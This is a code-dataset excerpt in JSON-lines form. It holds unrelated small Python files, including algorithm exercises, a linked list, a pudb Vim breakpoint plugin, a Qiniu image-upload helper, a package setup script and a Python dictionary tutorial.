True)","sub_path":"prepare_DRD.py","file_name":"prepare_DRD.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"622935845","text":"class Solution(object):\n\n def countComponents(self, n, edges):\n p = range(n)\n def find(v):\n print(p)\n if p[v] != v:\n p[v] = find(p[v])\n return p[v]\n\n for e in edges:\n v, w = map(find, e)\n p[v] = w\n if v != w:\n n -= 1\n print(n)\n return n\n\nn = 5\nedges = [[0, 1], [1, 2], [2, 3], [3, 4]]\n\nSolution().countComponents(n,edges)","sub_path":"UnionFind.py","file_name":"UnionFind.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"314354903","text":"lis=[\"abc\",\"aba\",\"abcba\",\"wc\"]\nc=0\nfor i in range(len(lis)):\n st=list(lis[i])\n if(len(st)>2):\n if(st[0]==st[len(st)-1]):\n c=c+1\nprint(c) \n \n \n \n \n \n \n \n","sub_path":"stringcount.py","file_name":"stringcount.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"339357850","text":"from math import sqrt\ndef prime(n):\n if n == 1:\n return False\n else:\n for i in range(2, int(sqrt(n))+1):\n if n % i == 0:\n return False\n return True\nm, n = map(int, input().split())\nfor i in range(m, n+1):\n if prime(i):\n print(i)\n","sub_path":"1929.py","file_name":"1929.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"561407998","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\n\nclass List:\n def __init__(self):\n self.head = None\n self.__size = 0\n\n def empty(self):\n return self.head is None if True else False\n\n def size(self):\n return self.__size\n\n def push_back(self, value):\n new_node = Node(value)\n if not self.empty():\n node = self.head\n while node.next is not None:\n node = node.next\n node.next = new_node\n else:\n self.head = new_node\n self.__size += 1\n\n def pop_back(self):\n if self.size() is 0:\n return\n elif self.size() is 1:\n self.head = None\n self.__size -= 1\n else:\n node = self.head\n while node.next.next is not None:\n node = node.next\n node.next = None\n self.__size -= 1\n\n def insert(self, index, value):\n new_node = Node(value)\n if index is 0:\n new_node.next = self.head\n self.head = new_node\n self.__size += 1\n elif self.size() - 1 >= index:\n node = self.head\n while index - 1 is not 0:\n node = node.next\n index -= 1\n new_node.next = node.next\n node.next = new_node\n self.__size += 1\n elif self.size() is index:\n self.push_back(value)\n\n def erase(self, index):\n if not self.empty():\n if index is 0:\n self.head = self.head.next\n self.__size -= 1\n elif self.size() - 1 > index:\n node = self.head\n while index - 1 is not 0:\n node = node.next\n index -= 1\n temp = node.next.next\n node.next = temp\n self.__size -= 1\n elif self.size() - 1 is index:\n self.pop_back()\n\n\nif __name__ == \"__main__\":\n _list = List()\n\n _list.push_back(0)\n _list.push_back(1)\n _list.push_back(2)\n _list.push_back(3)\n _list.push_back(4)\n _list.push_back(5)\n _list.push_back(6)\n _list.push_back(7)\n\n _list.pop_back()\n _list.pop_back()\n\n _list.insert(0, 100)\n _list.erase(0)\n\n _list.insert(6, 200)\n _list.erase(6)\n\n _list.insert(2, 300)\n _list.erase(2)\n","sub_path":"2. Single Linked List/code/SingleLinkedList.py","file_name":"SingleLinkedList.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"544940813","text":"# vim: tw=79\nimport vim\n\nfrom bdb import Breakpoint\nfrom itertools import starmap\nfrom linecache import checkcache\nfrom pudb.settings import load_breakpoints, save_breakpoints\nfrom pudb import NUM_VERSION\n\nLOAD_ARGS = () if NUM_VERSION >= (2013, 1) else (None,)\n\n\ndef breakpoints():\n \"\"\"\n :return: An iterator over the saved breakpoints.\n :rtype: starmap(Breakpoint)\n \"\"\"\n return starmap(Breakpoint, load_breakpoints(*LOAD_ARGS))\n\n\ndef breakpoint_dict():\n \"\"\"\n :return: The saved breakpoints, as a dict with (filename, line number) keys\n :rtype: dict(tuple(str, int), Breakpoint)\n \"\"\"\n return {(bp.file, bp.line): bp for bp in breakpoints()}\n\n\ndef breakpoint_strings(empty_cond_str=''):\n \"\"\"\n :return: An generator over the saved breakpoints as strings in the format:\n \"filename:linenr:condition\"\n :rtype: generator(str)\n \"\"\"\n return (\n '{file}:{line:d}:{cond}'.format(\n file=bp.file,\n line=bp.line,\n cond=bp.cond if bp.cond else empty_cond_str)\n for bp in breakpoints()\n )\n\n\ndef update_breakpoints():\n vim.eval('sign_unplace(g:pudb_sign_group)')\n for bp in breakpoints():\n try:\n opts = ('{\"lnum\": %d, \"priority\": %d}'\n % (bp.line, vim.vars['pudb_priority']))\n\n # Critical to use vim.eval here instead of vim.vars[] to get sign\n # group, since vim.vars[] will render the string as\n # \"b'pudb_sign_group'\" instead of \"pudb_sign_group\"\n vim.eval('sign_place(0, \"%s\", \"PudbBreakPoint\", \"%s\", %s)'\n '' % (vim.eval('g:pudb_sign_group'), bp.file, opts))\n except vim.error:\n # Buffer for the given file isn't loaded.\n continue\n\n\ndef current_position():\n \"\"\"\n :return: a filename, line number pair, to be used as a key for a\n breakpoint.\n :rtype: tuple(str, int)\n \"\"\"\n filename = vim.current.buffer.name\n row, _ = vim.current.window.cursor\n return (filename, row)\n\n\ndef toggle_breakpoint():\n \"\"\"\n Toggles a breakpoint on the current line.\n \"\"\"\n bps = breakpoint_dict()\n bp_key = current_position()\n\n if bp_key in bps:\n bps.pop(bp_key)\n else:\n bps[bp_key] = Breakpoint(*bp_key)\n\n save_breakpoints(bps.values())\n update_breakpoints()\n\n\ndef edit_breakpoint():\n \"\"\"\n Edit the condition of a breakpoint on the current line.\n If no such breakpoint exists, creates one.\n \"\"\"\n bps = breakpoint_dict()\n bp_key = current_position()\n\n if bp_key not in bps:\n bps[bp_key] = Breakpoint(*bp_key)\n bp = bps[bp_key]\n\n old_cond = '' if bp.cond is None else bp.cond\n vim.command('echo \"Current condition: %s\"' % old_cond)\n vim.command('echohl Question')\n vim.eval('inputsave()')\n bp.cond = vim.eval('input(\"New Condition: \", \"%s\")' % old_cond)\n vim.eval('inputrestore()')\n vim.command('echohl None')\n\n save_breakpoints(bps.values())\n update_breakpoints()\n\n\ndef clear_all_breakpoints():\n \"\"\"\n Clears all pudb breakpoints from all files.\n \"\"\"\n save_breakpoints([])\n update_breakpoints()\n\n\ndef list_breakpoints():\n \"\"\"\n Prints a list of all the breakpoints in all files.\n Shows the full file path, line number, and condition of each breakpoint.\n \"\"\"\n update_breakpoints()\n vim.command('echomsg \"Listing all pudb breakpoints:\"')\n for bp_string in breakpoint_strings():\n vim.command('echomsg \"%s\"' % bp_string)\n\n\ndef populate_list(list_command):\n \"\"\"\n Calls the given vim command with a list of the breakpoints as strings in\n quickfix format.\n \"\"\"\n update_breakpoints()\n bps = list(breakpoint_strings())\n vim.command('%s %s' % (list_command, bps))\n\n\ndef quickfix_list():\n \"\"\"\n Populate the quickfix list with the breakpoint locations.\n \"\"\"\n populate_list('cgetexpr')\n\n\ndef location_list():\n \"\"\"\n Populate the location list with the breakpoint locations.\n \"\"\"\n populate_list('lgetexpr')\n\n\ndef clear_linecache():\n \"\"\"\n Clear the python line cache for the given file if it has changed\n \"\"\"\n filename = vim.current.buffer.name\n checkcache(filename)\n update_breakpoints()\n","sub_path":"pythonx/pudb_and_jam.py","file_name":"pudb_and_jam.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"179584938","text":"# https://leetcode.com/problems/max-increase-to-keep-city-skyline/description/\nclass Solution:\n def maxIncreaseKeepingSkyline(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n m = len(grid)\n n = len(grid[0])\n maxrows = []\n maxcols = []\n res = 0\n for i in range(m):\n maxrow = 0\n for j in range(n):\n if grid[i][j] > maxrow:\n maxrow = grid[i][j]\n maxrows.append(maxrow)\n \n for j in range(n):\n maxcol = 0\n for i in range(m):\n if grid[i][j] > maxcol:\n maxcol = grid[i][j] \n maxcols.append(maxcol)\n \n print(maxrows)\n print(maxcols)\n for i in range(m):\n for j in range(n):\n minrc = min(maxrows[i], maxcols[j])\n res += minrc - grid[i][j]\n return res\n ","sub_path":"Test/NotCSharp/Python/MaxIncreaseInCitySkyline.py","file_name":"MaxIncreaseInCitySkyline.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"375356646","text":"# -*- coding:utf-8 -*-\n\nimport configparser\nimport uuid\nimport tempfile\nimport os\nfrom PIL import Image\nfrom qiniu import Auth, put_file\n\n# 读取配置文件\ncfg = configparser.ConfigParser()\ncfg.read('settings.cfg')\n\nIMAGE_MAX_SIZE = 4 * 1024 * 1024\nIMAGE_PATH = \"./upload/\"\nQINIU_URL = cfg['qiniu']['url']\n\nimage_types = (\n 'image/gif',\n 'image/jpeg',\n 'image/pjpeg',\n 'image/bmp',\n 'image/png',\n 'image/x-png')\n\n# 生成头像\ndef convert_avatar(picture, picture_info, tmp_name):\n originalWidth, originalHeight = picture.size\n\n scale = originalWidth / picture_info.get('previewWidth')\n\n box = (picture_info['clipX1'] * scale, picture_info['clipY1'] * scale, picture_info['clipX2'] * scale, picture_info['clipY2'] * scale)\n\n region = picture.crop(box)\n region.thumbnail((200, 200))\n region.save(tmp_name)\n\n# 上传到服务器\ndef upload_server(files, picture_info=None):\n # 验证是否传参\n if 'picture' not in files:\n return {\n \"picture\": None,\n \"error\": \"参数错误\"\n }\n\n # 验证图片格式\n send_file = files['picture'][0]\n if send_file['content_type'] not in image_types:\n return {\n \"picture\": None,\n \"error\": \"图片格式错误\"\n }\n\n # 验证图片大小\n if len(send_file['body']) > IMAGE_MAX_SIZE:\n return {\n \"picture\": None,\n \"error\": '图片不能大于4MB'\n }\n\n # 图片格式\n image_format = send_file['filename'].split('.').pop().lower()\n tmp_name = \"%s%s.%s\" % (IMAGE_PATH, uuid.uuid1(), image_format)\n\n if image_format == 'gif': # PIL保存gif有问题,只保存了第一帧\n fin = open(tmp_name, 'wb')\n fin.write(send_file['body'])\n fin.close()\n else:\n tmp_file = tempfile.NamedTemporaryFile(delete=True)\n tmp_file.write(send_file['body'])\n tmp_file.seek(0)\n\n try:\n image_one = Image.open(tmp_file.name)\n\n if picture_info != None: # 头像\n convert_avatar(image_one, picture_info, tmp_name)\n else:\n image_one.save(tmp_name)\n\n tmp_file.close()\n except:\n tmp_file.close()\n return {\n \"picture\": None,\n \"error\": \"图片异常\"\n }\n\n return {\n \"picture\": tmp_name,\n \"error\": None\n }\n\ndef get_qiniu_token(key=None, expires=3600):\n # 需要填写你的 Access Key 和 Secret Key\n access_key = cfg['qiniu']['access_key']\n secret_key = cfg['qiniu']['secret_key']\n\n # 构建鉴权对象\n q = Auth(access_key, secret_key)\n\n # 要上传的空间\n bucket_name = cfg['qiniu']['bucket_name']\n\n policy = {\n \"returnBody\": '{\"key\": $(key), \"hash\": $(etag), \"w\": $(imageInfo.width), \"h\": $(imageInfo.height)}',\n \"saveKey\": '$(etag)$(ext)'\n }\n\n token = q.upload_token(bucket_name, key, expires, policy)\n\n return token\n\n# 上传到七牛\ndef upload_qiniu(localfile):\n # 上传到七牛后保存的文件名\n #image_format = localfile.split('.').pop()\n #image_name = uuid.uuid1()\n \n #key = \"%s.%s\" % (image_name, image_format)\n\n # $(ext) .png\n # saveKey 文件命名规则\n\n # 生成上传Token,可以指定过期时间等\n token = get_qiniu_token(None, 3600)\n\n try:\n ret, info = put_file(token, None, localfile)\n os.remove(localfile)\n ret['url'] = '%s%s' % (QINIU_URL, ret.get('key'))\n return ret\n except:\n os.remove(localfile)\n return None\n\n# 上传图片\ndef upload_picture(files, picture_info=None):\n # 上传到服务器\n picture = upload_server(files, picture_info)\n if picture['picture']:\n # 上传到七牛\n return upload_qiniu(picture['picture'])\n else:\n return None","sub_path":"site/utils/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"433434455","text":"import setuptools\n\n\nwith open('README.md', 'r') as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name='croo',\n version='0.4.2.1',\n scripts=['bin/croo'],\n python_requires='>=3.6',\n author='Jin Lee',\n author_email='leepc12@gmail.com',\n description='CRomwell Output Organizer',\n long_description='https://github.com/ENCODE-DCC/croo',\n long_description_content_type='text/markdown',\n url='https://github.com/ENCODE-DCC/croo',\n packages=setuptools.find_packages(exclude=['examples', 'docs']),\n classifiers=[\n 'Programming Language :: Python :: 3',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: POSIX :: Linux',\n ],\n install_requires=['autouri>=0.1.2.1', 'graphviz', 'miniwdl', 'caper']\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"136692407","text":"import math\nclass Solution:\n # @param {integer} n\n # @param {integer} k\n # @return {string}\n def getPermutation(self, n, k):\n numbers = range(1, n+1)\n permutation = ''\n k -= 1\n while n > 0:\n n -= 1\n # get the index of current digit\n index, k = divmod(k, math.factorial(n))\n permutation += str(numbers[index])\n # remove handled number\n numbers.remove(numbers[index])\n\n return permutation\n\n def getPermutation(self, n, k):\n \"\"\"\n :type n: int\n :type k: int\n :rtype: str\n \"\"\"\n k -= 1\n total = 1\n fac_sum = [1]\n for n in range(1,n+1):\n total *= n\n fac_sum.append(total)\n count = [n for n in range(1,n+1)]\n ans = \"\"\n for i in range(1,n+1):\n idx = int(k/fac_sum[n-i])\n ans += str(count[idx])\n count.pop(idx)\n k -= idx*fac_sum[n-i]\n return ans\n","sub_path":"Python/60.py","file_name":"60.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"501750426","text":"from __future__ import print_function\n\na = []\nn, m = [int(x) for x in input().split()]\n\nfor i in range(0, n):\n\tb = []\n\tfor j in input().split():\n\t\tb.append(int(j))\n\ta.append(b)\n\nmaxn = a[0][0]\nnumr = 0\nfor i in range(0, n):\n\tfor j in range(0, m):\n\t\tif a[i][j] > maxn:\n\t\t\tmaxn = a[i][j]\n\t\t\tnumr = i \n\nmaxes = []\nmaxes.append(numr)\nfor i in range(0, n):\n\tfor j in range(0, m):\n\t\tif a[i][j] == maxn and i != numr:\n\t\t\tmaxes.append(i)\n\nb = []\nmaxsum = 0\nfor i in range(0, len(maxes)):\n\tb.append(0)\n\tfor j in range(0, m):\n\t\tb[i] = b[i] + a[i][j]\n\tif b[i] > maxsum:\n\t\tmaxsum = b[i]\n\t\tnumr = i\n\nprint(numr)\n\n\n\n\n","sub_path":"week10/arrays/358.py","file_name":"358.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"499640708","text":"# -*- coding: utf-8 -*-\nfrom django.http import HttpResponse\nfrom django.template import RequestContext\nfrom primus.base.views import BaseListView\nfrom django.shortcuts import render_to_response\nfrom promotion.models import *\n\ndef promotion (request, slug):\n promotion = Promotion.objects.get(slug=slug)\n promotion_items = PromotionItem.objects.filter(promotion=promotion)\n items = [p_i.item for p_i in promotion_items]\n \n\n context = BaseListView(request, items).run()\n \n context.update({\n 'title': '',\n 'header': promotion.description,\n 'app_shop': True,\n })\n return render_to_response('promotion/list%s.html' % ('_include' if request.is_ajax() else ''),\n context,\n context_instance=RequestContext(request))\n ","sub_path":"promotion/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"447673227","text":"\"\"\"\n第7章 映像和集合类型\n本章主题\n♦ 映射类型:字典\n♦ 操作符\n♦ 内建函数\n♦ 内建方法\n♦ 字典的键\n♦ 集合类型\n♦ 操作符\n♦ 内建函数\n♦ 内建方法\n♦ 相关模块\n\n本章我们来讨论Python语言中的映像类型和集合类型。和前面的章节一样,我们首先做一个介绍,再来讨论可用操作符,工厂函数、内建函数(BIF)和方法,然后再来看看每种数据类型的详细用法。\n\n7.1 映射类型:字典\n字典是Python语言中唯一的映射类型。映射类型对象里哈希值(键,key)和指向的对象(值。value)是一对多的关系。它们与Perl中的哈希类型(译者注:又称关联数组)相似,通常被认为是可变的哈希表。\n一个字典对象是可变的,它是一个容器类型,能存储任意个数的Python对象,其中也包括其他容器类型。字典类型和序列类型容器类(列表、元组)的区别是存储和访问数据的方式不同。序列类型只用数字类型的键(从序列的开始起按数值顺序索引)。映射类型可以用其他对象类型做键,一般最常见的是用字符串做键。\n和序列类型的键不同,映像类型的键直接或间接地和存储的数据值相��联。但因为在映射类型中,我们不再用“序列化排序”的键,所以映像类型中的数据是无序排列的。\n显然,这并不影响我们使用映射类型,因为映射类型不要求用数字值做索引以从一个容器中获取对应的数据项。你可以用键直接“映射”到值,这就是为什么叫映射类型(“mapping type”)的原因。映射类型通常被称做哈希表,是因为字典对象就是哈希类型的。字典是Python中最强大的数据类型之一。\n核心笔记:什么是哈希表?它们与字典的关系是什么?\n序列类型用有序的数字键做索引将数据以数组的形式存储。一般索引值与所存储的数据毫无关系。还可以用另一种方式来存储数据:基于某种相关值,比如说一个字符串。我们在日常生活中一直这么做。把人们的电话号码按照他们的姓记录在电话簿上,按照时间在日历或约会簿上添加事件,等等。\n在这些例子中,你的键就是和数据项相关的值。哈希表是一种数据结构:它按照我们所要求的去工作。哈希表中存储的每一条数据,叫做一个值(value),是根据与它相关的一个被称作为键(key)的数据项进行存储的。键和值合在一起被称为“键-值对”(key-value pairs)。\n哈希表的算法是获取键,对键执行一个叫做哈希函数的操作,并根据计算的结果,选择在数据结构的某个地址中来存储你的值。任何一个值存储的地址皆取决于它的键。正因为这种随意性,哈希表中的值是没有顺序的。你拥有的是一个无序的数据集。\n你所能获得的有序集合只能是字典中的键的集合或者值的集合。方法Keys()或values()返回一个列表,该列表是可排序的。你还可以用items()方法得到包含键、值对的元组的列表来排序。由于字典本身是哈希的,所以是无序的。\n哈希表一般有很好的性能,因为用键查询相当快。\nPython的字典是作为可变的哈希表实现的。如果你熟悉Perl的话,就可以发现字典与Perl中的“关系数组”或散列相似。\n现在我们就来研究Python字典。一个字典条目的语法格式是键值。而且,多条字典条目被包含在大括号({})里。\n\"\"\"\n\n\"\"\"\n7.1.1 如何创建字典和给字典赋值\n创建字典只需要把字典赋值给一个变量,不管这个字典是否包含元素。\n>>> dict1 = {}\n>>> dict2 = {'name': 'earth', 'port': 80}\n>>> dict1, dict2\n({}, {'port': 80, 'name': 'earth'})\n\"\"\"\ndict1 = {}\ndict2 = {'name': 'earch', 'port':\"80\"}\nprint(dict1)\nprint(dict2)\n\n\"\"\"\n从Python 2.2版本起,可以用工厂方法dict()来创建字典。当我们详细讨论dict()的时候会看到更多的例子,现在来看一个小例子。\n>>> fdict = dict((['x', 1], ['y', 2]))\n>>> fdict\n{'y': 2, 'x': 1}\n\"\"\"\nfdict = dict((['x', 1], ['y', 2]))\nprint(fdict)\n\"\"\"\n从Python 2.3版本起,可以用一个很方便的内建方法fromkeys()来创建一个“默认”字典,字典中元素具有相同的值(如果没有给出,默认为None)\n>>> ddict = {}.fromkeys(('x', 'y'), -1)\n>>> ddict\n{'y': -1, 'x': -1}print(dirt)\n>>> edict = {}.fromkeys(('foo', 'bar'))\n>>> edict\n{'foo': None, 'bar': None}\n\"\"\"\nddict = {}.fromkeys(('x', 'y'), -1)\nprint(ddict)\nedict = {}.fromkeys(('foo', 'bar'))\nprint(edict)\n\n\"\"\"\n7.1.2 如何访问字典中的值\n要想遍历一个字典(一般用键),你只需要循环查看它的键,像这样>>> dict2 = {'name': 'earth', 'port': 80}\n>>>\n>>>> for key in dict2.keys():\n... print 'key=%s, value=%s' % (key, dict2[key])\n...\nkey=name, value=earth\nkey=port, value=80\n\"\"\"\ndict2 = {'name': 'earch', 'port':80}\nfor key in dict2.keys():\n print(\"key = %s, value = %s\" % (key, dict2[key]))\n\"\"\"\n从Python 2.2开始,你可以不必再用keys()方法获取供循环使用的键值列表了。可以用迭代器来轻松地访问类序列对象(sequence-like objects),比如字典和文件。只需要用字典的名字就可以在for循环里遍历字典。\n>>> dict2 = {'name': 'earth', 'port': 80}\n>>>\n>>>> for key in dict2:\n... print 'key=%s, value=%s' % (key, dict2[key])\n...\nkey=name, value=earth\nkey=port, value=80\n\"\"\"\nfor key in dict2:\n print(\"key = %s, value = %s\" % (key, dict2[key]))\n\"\"\"要得到字典中某个元素的值,可以用你所熟悉的字典键加上中括号来得到。\n>>> dict2['name']\n'earth'\n>>>\n>>> print 'host %s is running on port %d' % \\\n... (dict2['name'], dict2['port'])\nhost earth is running on port 80\n字典dict1是空的,字典dict2有两个数据元素。字典dict2的键是‘name’和‘port’,它们对应的值分别是‘earth’和80。就像你看到的,通过键‘name’可以得到字典中的元素的值。\n如果我们想访问该字典中的一个数据元素,而它在这个字典中没有对应的键,将会产生一个错误:\n>>> dict2['server'] Traceback (innermost last):\nFile \"\", line 1, in ?\nKeyError: server\n在这个例子中,我们试图获得字典中‘server’键所对应的值。你从上面的代码知道,‘server’这个键并不存在。检查一个字典中是否有某个键的最好方法是用字典的has_key()方法,或者另一种比较好的方法就是从2.2版本起用的,in或not in操作符。has_key()方法将会在未来的Python版本中弃用,所以用in或not in是最好的方法。\n下面我们将介绍字典所有的方法。方法has_key()和in以及not in操作符都是布尔类型的。对于前两者而言,如果字典中有该键就返回真(True),否则返回假(False) (Python 2.3版本以前,没有布尔常量,为真时返回1,假时返回0)。\n>>> 'server' in dict2 # 或 dict2.has_key('server')\nFalse\n>>> 'name' in dict # 或 dict2.has_key('name')\nTrue\n>>> dict2['name']\n'earth'\n\"\"\"\nprint('server' in dict2)\nprint('name' in dict1)\n\"\"\"\n一个字典中混用数字和字符串的例子:\n\"\"\"\ndict3 = {}\ndict3[1] = 'abc'\ndict3['1'] = 3.14\ndict3[3.2] = 'xyz'\nprint(dict3)\n\"\"\"\n除了逐一地添加每个键-值对外,我们也可以给dict3整体赋值。\ndict3 = {3.2: 'xyz', 1: 'abc', '1': 3.14159}\n如果事先已经知道所有的数据就可以用键-值对来创建一个字典(这是显而易见的)。通过字典dict3的示例说明你可以采用各种类型的数据作为字典的键。如果我们被问到是否可以改变某个字典值的键时,你可能会说“不”,对吗?\n为什么在执行中字典中的键不允许被改变呢?你这样想就会明白:比方说,你创建了一个字典,字典中包含一个元素(一个键和一个值)。可能是由于某个变量的改变导致键发生了改变。这时候你如果用原来的键来取出字典里的数据, 会得到KeyError(因为键的值已经改变了),现在你没办法从字典中获取该值了,因为键本身的值发生了变化。\n由于上面的原因,字典中的键必须是可哈希的,所以数字和字符串可以作为字典中的键,但是列表和其他字典不行(见7.5.2小节字典的键必须是可哈希的)。\n\"\"\"\n\n\"\"\"\n7.1.3 如何更新字典\n你可以通过以下几种方式对一个字典做修改:添加一个新数据项或新元素(即,一个键-值对);修改一个已存在的数据项;或删除一个已存在的数据项(下面有关于数据项删除操作的详细讲述)。\n>>> dict2['name'] = 'venus' # 更新已有条目\n>>> dict2['port'] = 6969 # 更新已有条目\n>>> dict2['arch'] = 'sunos5'# 增加新条目\n>>>\n>>> print 'host %(name)s is running on port %(port)d' %dict2\nhost venus is running on port 6969\n\"\"\"\ndict2['name'] = 'venus'\ndict2['port'] = 6969\ndict2['arch'] = 'aaa'\nprint(\"host %(name)s is runing on port %(port)d\" % dict2)\n\"\"\"\n\\如果字典中该键已经存在,则字典中该键对应的值将被新值替代。上面的print语句展示了另一种在字典中使用字符串格式符(%)的方法。用字典参数可以简化print语句,因为这样做你只需要用到一次该字典的名字,而不用在每个元素出现的时候都用元组参数表示。你也可以用内建方法update()将整个字典的内容添加到另一个字典。我们将在7.4节介绍此方法。\n\n7.1.4 如何删除字典元素和字典\n删除整个字典的操作不常见。通常,你删除字典中的单个元素或是清除整个字典的内容。但是,如果你真想“删除”一个字典,用del语句(介绍见小节3.5.5)。以下是删除字典和字典元素的例子。\n\"\"\"\ndel dict2['name']\ndict2.clear()\nprint(dict2)\ndel dict2\n\"\"\"\n核心提示:避免使用内建对象名字作为变量的标识符\n如果在Python2.3前,你已经开始使用Python,你可能用dict作为一个字典的标识符。但是,因为dict()现在已成为Python的类型和工厂方法,重载dict()会给你带来麻烦和潜在的bugs。编译器允许你做这样的重载,它认为你是聪明的,知道自己正在做什么!小心。请不要用dict、list、file、bool、str、input、len这样的内建类型为变量命名。\n\"\"\"\n\n","sub_path":"CorePythonAP/7_Mapping/7_1_Mapping_Type_Dictionaries.py","file_name":"7_1_Mapping_Type_Dictionaries.py","file_ext":"py","file_size_in_byte":10506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"525445403","text":"import pymongo\nfrom bson import ObjectId\nfrom datetime import datetime\n\nclass Editor():\n def __str__(self) -> str:\n return str(self.toDictionary())\n\n def toDictionary(self):\n dico = {\n \"NbrTVA\": self.NbrTVA,\n \"name\": self.name,\n \"creationDate\": self.creationDate,\n \"books\": self.books\n }\n return dico\n\n def save(self):\n if not self._id:\n self.collection.insert_one(self.toDictionary())\n editor = self.collection.find_one({ \"NbrTVA\": self.NbrTVA, \"name\": self.name })\n self._id = editor[\"_id\"]\n else:\n self.collection.update_one({ \"_id\": self._id }, { \"$set\" : self.toDictionary() })\n\n def delete(self):\n if self._id:\n self.collection.find_one_and_delete({ \"_id\": self._id })\n\n def __init__(self, collection, NbrTVA, name):\n self.collection = collection\n editor = self.collection.find_one({ \"NbrTVA\": NbrTVA, \"name\": name })\n if editor:\n self._id = editor[\"_id\"]\n self.NbrTVA = editor[\"NbrTVA\"]\n self.name = editor[\"name\"]\n self.creationDate = editor[\"creationDate\"]\n self.books = editor[\"books\"]\n else:\n self._id = 0\n self.NbrTVA = NbrTVA\n self.name = name\n self.craetionDate = datetime.now()\n self.books = []","sub_path":"04_mango_db/DayThree/models/editor.py","file_name":"editor.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"563545877","text":"tests = input()\ntests = int(tests)\n\nlists = []\nfor i in range(tests):\n list1 = list(map(int, input().split()))\n lists.append(list1)\n\ndef IsPrime(num):\n if num == 1:\n return False\n\n for i in range(2, num // 2 + 1):\n if num % i == 0:\n return False\n return True\n\ndef func(object):\n result = []\n for i in range(object[0], (object[1])+1):\n num = int(i)\n if IsPrime(num):\n result.append(num)\n for i in range(result.__len__()):\n if i == result.__len__()-1:\n print(str(result[i]), end=\"\")\n else:\n print(str(result[i]) + \" \", end=\"\")\n print()\n\nfor i in range(lists.__len__()):\n func(lists[i])","sub_path":"Code/CodeRecords/2194/60590/235081.py","file_name":"235081.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"560126873","text":"import numpy as np\n\ndef controlpoints(Ncp, z1, z2, eps=0, include_ends=False):\n #thetacp = np.arange(np.pi, 0, -np.pi/self.Ncp) - 0.5 * np.pi/self.Ncp\n # The following works MUCH better for a uniform head along the line\n thetacp = np.linspace(np.pi, 0, Ncp+2)[1:-1]\n if include_ends:\n Zcp = np.zeros(Ncp+2, 'D')\n Zcp[0] = -1\n Zcp[-1] = 1\n Zcp[1:-1] = np.cos(thetacp)\n else:\n #thetacp = np.arange(np.pi, 0, -np.pi/Ncp) - 0.5 * np.pi/Ncp\n Zcp = np.zeros(Ncp, 'D')\n Zcp.real = np.cos(thetacp)\n Zcp.imag = eps # control point just on positive side (this is handy later on)\n zcp = Zcp * (z2 - z1) / 2.0 + 0.5 * (z1 + z2)\n return zcp.real, zcp.imag","sub_path":"tethysapp/aemdewater2/timml/dev/timml/controlpoints.py","file_name":"controlpoints.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"72454620","text":"import numpy as np\nimport matplotlib.pylab as plt\n\ndef function_1(x):\n return 0.01*x**2 + 0.1*x\n\ndef numerical_gradient(f, x):\n h = 1e-4\n grad = np.zeros_like(x)\n\n for idx in range(x.size):\n tmp_val = x[idx]\n x[idx] = tmp_val + h\n fxh1 = f(x)\n\n x[idx] = tmp_val - h\n fxh2 = f(x)\n\n grad[idx] = (fx1 - fx2) / (2*h)\n x[idx] = tmp_val\n\ndef gradient_descent(f, init_x, l=0.01, step_num=100):\n x = init_x\n\n for i in range(step_num):\n grad = numerical_gradient(f, x)\n x -= lr * grad\n return x\n\nclass simpleNet:\n def __init__(self):\n self.W = np.random.randn(2, 3)\n\n def predict(self, x):\n return np.dot(x, self.W)\n\n def loss(self, x, t):\n z = self.predict(x)\n y = softmax(z)\n loss = cross_entropy_error(y, t)\n return loss\n\n\nx = np.arange(0.0, 20.0, 0.1)\ny = function_1(x)\nplt.xlabel(\"x\")\nplt.ylabel(\"f(x)\")\nplt.plot(x, y)\nplt.show()\n\n","sub_path":"section4/gradient.py","file_name":"gradient.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"246478428","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 25 22:16:17 2018\n\n@author: Ganesh_Bhargav\n\"\"\"\n\n# Import the 